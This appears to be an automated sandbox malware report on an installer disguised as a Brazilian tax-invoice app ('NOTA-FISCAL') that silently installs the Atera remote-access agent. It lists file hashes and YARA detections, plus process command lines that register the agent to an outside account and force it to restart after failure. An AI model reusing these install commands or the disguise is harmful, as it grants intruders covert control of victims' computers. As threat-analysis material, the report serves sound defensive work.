                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFDAABEC74117CC1C6.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.6207987421976968
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:W8PhPuRc06WXJEFT5uDKqISoedvPdvbCnuhnq9Onq9BGdStedvPdvxubS:phP1HFTQDvIciuBuOV4
                                                                                                                                                                                                                                                                                              MD5:6C9F273A8707FD4E195FF4F2D79178E2
                                                                                                                                                                                                                                                                                              SHA1:2D675F7C4F6C99B84F9E9AC474E2772E03EA733E
                                                                                                                                                                                                                                                                                              SHA-256:F94292120E245269A40A88370601D3277F4B63CC8650FEE6BE014288291F108E
                                                                                                                                                                                                                                                                                              SHA-512:3CF295A01EEC2777ECA7F1D7F282DF1D65B76EBA48F696E452FFB4302805B069A9D2C6CDAA1249ECC970561C94690418B932C6EE5154D1078D8343DFD2C15A97
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFE507A9E0C295E778.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.2309993325116284
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:3VUuKNveFXJ5T5CDyqISoedGPdGTWaStedGPdGTn:lU8hTkDHIOD
                                                                                                                                                                                                                                                                                              MD5:FCF8BEAA29D6285CFF2000F44F4B5972
                                                                                                                                                                                                                                                                                              SHA1:E80DDE73FF4C29E48F5AF474C1479F4C0AD9346D
                                                                                                                                                                                                                                                                                              SHA-256:81E2E2373C75874284C496257AFDEDE5F9FFD13077B1BA8181110017F962093C
                                                                                                                                                                                                                                                                                              SHA-512:DCF47F5317C3EF5536F31770F2A769157F01190CD30C776C372A6CE8DE13917AE782AB42E681DF3716E3136790B0C33D6E204ECFA2B855530366DB0C5CBF5B4A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFEE64D0168B710AC4.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.6207987421976968
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:W8PhPuRc06WXJEFT5uDKqISoedvPdvbCnuhnq9Onq9BGdStedvPdvxubS:phP1HFTQDvIciuBuOV4
                                                                                                                                                                                                                                                                                              MD5:6C9F273A8707FD4E195FF4F2D79178E2
                                                                                                                                                                                                                                                                                              SHA1:2D675F7C4F6C99B84F9E9AC474E2772E03EA733E
                                                                                                                                                                                                                                                                                              SHA-256:F94292120E245269A40A88370601D3277F4B63CC8650FEE6BE014288291F108E
                                                                                                                                                                                                                                                                                              SHA-512:3CF295A01EEC2777ECA7F1D7F282DF1D65B76EBA48F696E452FFB4302805B069A9D2C6CDAA1249ECC970561C94690418B932C6EE5154D1078D8343DFD2C15A97
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DFF490C3560564DA83.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4019
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.255342738012416
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:8gDOYIg8OPgFOM3gYgOVOhVWgBNNXzHSxBNN4zPzRlXNzSPeZgg9dSjedcdS4dSC:Vb4oH8afhbZh9A6qA4AAADjAN
                                                                                                                                                                                                                                                                                              MD5:8194759065D93E08EF8CB2774B204096
                                                                                                                                                                                                                                                                                              SHA1:8470603A95C936FF195596ECC586987F7CA38EC7
                                                                                                                                                                                                                                                                                              SHA-256:260647229E0A266CEE9DFC32FFA136D007677A8379CE50C3B6BF32CE6A47E1FF
                                                                                                                                                                                                                                                                                              SHA-512:5304FB8B48FF944AD7F44470FC8C1E74AB44B6CA3E85160F30B92F3C8CD5D0515A26AAF9D5D4071DAD1CF5FD50F9E8754341D9C453ACAEDFCF91521B3A4AF6CD
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: \Device\ConDrv, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:2025-01-06 06:59:26.7350|ERROR|WindowsWindowedEventLogProvider|Error on retry number 1: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2025-01-06 06:59:27.8600|ERROR|WindowsWindowedEventLogProvider|Error on retry number 2: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2025-01-06 06:59:29.9225|ERROR|WindowsWindowedEventLogProvider|Error on retry number 3: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2025-01-06 06:59:32.9538|ERROR|WindowsWindowedEventLogProvider|Error initializing last processed events, ignoring file, exception: System.IO.FileNotFoundException: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...File name: 'C:\Progr
                                                                                                                                                                                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: Intel;1033, Revision Number: {721AD955-79FD-4019-BBF5-9DCC4C1175BB}, Create Time/Date: Wed Feb 28 10:52:02 2024, Last Saved Time/Date: Wed Feb 28 10:52:02 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.878673655295741
                                                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                                                              • Microsoft Windows Installer (60509/1) 57.88%
                                                                                                                                                                                                                                                                                              • ClickyMouse macro set (36024/1) 34.46%
                                                                                                                                                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 7.66%
                                                                                                                                                                                                                                                                                              File name:APLICATIVO-WINDOWS-NOTA-FISCAL.msi
                                                                                                                                                                                                                                                                                              File size:2'994'176 bytes
                                                                                                                                                                                                                                                                                              MD5:7ce6669643890d209540d68e76c0cfcc
                                                                                                                                                                                                                                                                                              SHA1:c49df2e823d5e2461a11c96ad4d36974c7fffc9a
                                                                                                                                                                                                                                                                                              SHA256:27f1cdf3422c4c87d9d273a62df4404339119e416d16d8512479d87acd07c12b
                                                                                                                                                                                                                                                                                              SHA512:dfb7cde9198fe29e9b8738ab2ddca34db87c3be6d9eb1c68e507ffb59f4f9e66761ab84a1e40b4fa040aa061f214c2e2ea1efcfc875bcca44bdf947639ef10ed
                                                                                                                                                                                                                                                                                              SSDEEP:49152:a+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oqPxMbY+K/tzQz:a+lUlz9FKbsodq0YaH7ZPxMb8tT
                                                                                                                                                                                                                                                                                              TLSH:CFD523117584483AE37B0A358D7ADAA05E7DFE605B70CA8E9308741E2D705C1AB76FB3
                                                                                                                                                                                                                                                                                              File Content Preview:........................>......................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Icon Hash:2d2e3797b32b2b99
                                                                                                                                                                                                                                                                                              Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.


                                                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                                                              Start time:06:57:58
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\APLICATIVO-WINDOWS-NOTA-FISCAL.msi"
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7da920000
                                                                                                                                                                                                                                                                                              File size:69'632 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                                                                              Start time:06:57:58
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7da920000
                                                                                                                                                                                                                                                                                              File size:69'632 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                                                              Start time:06:57:58
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding BF843BCBC9EBED5C34216282DB92822D
                                                                                                                                                                                                                                                                                              Imagebase:0x2b0000
                                                                                                                                                                                                                                                                                              File size:59'904 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                                                              Start time:06:57:59
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:rundll32.exe "C:\Windows\Installer\MSI2D79.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893046 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                                                                                                                                                                                                                                                                              Imagebase:0x880000
                                                                                                                                                                                                                                                                                              File size:61'440 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

Target ID:4
Start time:06:57:59
Start date:06/01/2025
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Windows\Installer\MSI2FBD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893546 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
Imagebase:0x880000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000002.1702577102.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000004.00000002.1702577102.0000000004CA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:true

Target ID:5
Start time:06:58:03
Start date:06/01/2025
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:rundll32.exe "C:\Windows\Installer\MSI3FBB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6897625 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
Imagebase:0x880000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:true

Target ID:6
Start time:06:58:04
Start date:06/01/2025
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 3A3D5EBA34EB9624AE48E4F4D08FECDB E Global\MSI0000
Imagebase:0x2b0000
File size:59'904 bytes
MD5 hash:9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:06:58:04
Start date:06/01/2025
Path:C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):true
Commandline:"NET" STOP AteraAgent
Imagebase:0x1d0000
File size:47'104 bytes
MD5 hash:31890A7DE89936F922D44D677F681A7F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:06:58:04
Start date:06/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:06:58:04
Start date:06/01/2025
Path:C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\net1 STOP AteraAgent
Imagebase:0xcd0000
File size:139'776 bytes
MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:06:58:04
Start date:06/01/2025
Path:C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):true
Commandline:"TaskKill.exe" /f /im AteraAgent.exe
Imagebase:0xf40000
File size:74'240 bytes
MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:11
Start time:06:58:04
Start date:06/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:12
Start time:06:58:04
Start date:06/01/2025
Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="contato@fazendadoscordeiros.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000P2oAPIAZ" /AgentId="52187e48-563c-468d-9785-3542f81fb412"
Imagebase:0x1779dac0000
File size:145'968 bytes
MD5 hash:477293F80461713D51A98A24023D45E8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
Antivirus matches:
• Detection: 26%, ReversingLabs
Has exited:true

Target ID:13
Start time:06:58:08
Start date:06/01/2025
Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
Imagebase:0x21c41e20000
File size:145'968 bytes
MD5 hash:477293F80461713D51A98A24023D45E8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2294249455.0000021C41ED0000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2355746152.0000021C5AFE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42A76000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2364577218.0000021C5B491000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2392527211.0000021C5B928000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2296889526.0000021C42290000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C427D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42B9E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42E23000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2292749286.000000AF46BD5000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2294760147.0000021C42109000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C429FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C42B39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000000D.00000002.2297128226.0000021C429EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                                                                              Start time:06:58:08
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6f92a0000
                                                                                                                                                                                                                                                                                              File size:72'192 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                                                                              Start time:06:58:08
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                                                                              Start time:06:58:09
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:rundll32.exe "C:\Windows\Installer\MSI56F2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6903546 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                                                                                                                                                                                                                                                                                              Imagebase:0x880000
                                                                                                                                                                                                                                                                                              File size:61'440 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1807492407.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000010.00000002.1807492407.0000000004D54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                                                                              Start time:06:58:23
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff699450000
                                                                                                                                                                                                                                                                                              File size:468'120 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                                                              Start time:06:58:23
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
